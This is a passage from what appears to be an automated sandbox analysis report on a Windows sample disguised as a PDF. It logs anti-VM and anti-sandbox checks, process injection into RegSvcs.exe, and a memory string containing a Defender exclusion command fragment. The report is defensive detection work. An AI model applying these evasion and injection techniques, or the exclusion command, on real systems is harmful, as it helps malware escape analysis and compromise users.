                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.28df808.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.28e7814.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.306440139.00000000029B7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 7036, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306440139.00000000029B7000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306440139.00000000029B7000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 7032Thread sleep time: -40875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 5768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1388Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 40875Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: RegSvcs.exe, 00000009.00000002.559743287.0000000006300000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0168C148 LdrInitializeThunk,9_2_0168C148
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 105D008Jump to behavior
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                      Source: RegSvcs.exe, 00000009.00000002.557934675.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: RegSvcs.exe, 00000009.00000002.557934675.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000009.00000002.557934675.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: RegSvcs.exe, 00000009.00000002.557934675.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Users\user\Desktop\20220114080343434.pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
